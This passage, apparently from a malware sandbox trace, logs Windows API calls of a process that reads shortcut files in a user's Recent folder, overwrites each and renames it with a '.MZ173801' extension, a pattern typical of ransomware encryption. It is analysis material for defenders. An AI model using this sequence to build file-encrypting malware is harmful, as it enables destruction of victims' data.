lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.619] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mmI1-6XkHu4NPFT8JK.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mmi1-6xkhu4npft8jk.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea97eea1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea97eea1, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea97eea1, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x5fa)) returned 1 [0109.619] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.619] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.620] GetCurrentThreadId () returned 0x1358 [0109.620] GetCurrentThreadId () returned 0x1358 [0109.620] GetCurrentThreadId () returned 0x1358 [0109.620] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.620] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.621] GetCurrentThreadId () returned 0x1358 [0109.621] GetCurrentThreadId () returned 0x1358 [0109.621] GetCurrentThreadId () returned 0x1358 [0109.621] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mmI1-6XkHu4NPFT8JK.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mmi1-6xkhu4npft8jk.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.621] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.621] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.621] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x5fa [0109.621] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.621] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x5fa, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x5fa, lpOverlapped=0x0) returned 1 [0109.622] CloseHandle (hObject=0x3f4) returned 1 [0109.622] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mmI1-6XkHu4NPFT8JK.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mmi1-6xkhu4npft8jk.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.623] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x5fa, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x5fa, lpOverlapped=0x0) returned 1 [0109.624] CloseHandle (hObject=0x3f4) returned 1 [0109.625] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mmI1-6XkHu4NPFT8JK.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mmi1-6xkhu4npft8jk.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\mmI1-6XkHu4NPFT8JK.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mmi1-6xkhu4npft8jk.lnk.mz173801")) returned 1 [0109.681] GetCurrentThreadId () returned 0x1358 [0109.681] GetCurrentThreadId () returned 0x1358 [0109.681] GetCurrentThreadId () returned 0x1358 [0109.681] GetCurrentThreadId () returned 0x1358 [0109.681] GetCurrentThreadId () returned 0x1358 [0109.681] GetCurrentThreadId () returned 0x1358 [0109.681] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d1d5653, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x6d1d5653, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x6d1d5653, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="MRdmd02KMM5JtOIVQ.lnk", cAlternateFileName="MRDMD0~1.LNK")) returned 1 [0109.681] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.681] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.681] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MRdmd02KMM5JtOIVQ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mrdmd02kmm5jtoivq.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d1d5653, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x6d1d5653, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x6d1d5653, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x485)) returned 1 [0109.681] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.681] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.682] GetCurrentThreadId () returned 0x1358 [0109.682] GetCurrentThreadId () returned 0x1358 [0109.682] GetCurrentThreadId () returned 0x1358 [0109.682] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.682] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.682] GetCurrentThreadId () returned 0x1358 [0109.682] GetCurrentThreadId () returned 0x1358 [0109.682] GetCurrentThreadId () returned 0x1358 [0109.682] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MRdmd02KMM5JtOIVQ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mrdmd02kmm5jtoivq.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.682] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.683] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.683] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x485 [0109.683] 